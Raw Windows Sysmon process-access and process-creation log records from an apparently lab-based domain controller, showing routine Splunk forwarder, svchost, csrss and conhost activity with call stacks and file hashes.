13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004655Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004654Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004653Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004652Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.333{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:47.334{59A5CD1D-8FA3-6005-FD00-00000000A301}1756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.770{59A5CD1D-8FA4-6005-FF00-00000000A301}6642752C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.614{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.614{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004678Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.615{59A5CD1D-8FA4-6005-FF00-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004677Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.161{59A5CD1D-8FA4-6005-FE00-00000000A301}32401132C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004676Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8FA4-6005-FE00-00000000A301}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004675Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004674Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:39:48.020{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 